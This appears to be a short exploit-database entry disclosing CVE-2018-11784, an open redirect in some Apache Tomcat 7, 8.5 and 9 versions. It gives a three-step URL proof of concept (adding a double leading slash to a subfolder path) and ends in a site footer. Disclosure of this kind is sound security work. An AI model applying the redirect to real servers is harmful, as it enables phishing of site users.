# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect # Date: 10/04/2018 # Exploit Author: Central InfoSec # Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90 # CVE : CVE-2018-11784 # Proof of Concept: # Identify a subfolder within your application http://example.com/test/ # Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash http://example.com//test # Browse to the newly created URL and the application will perform a redirection http://test/
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
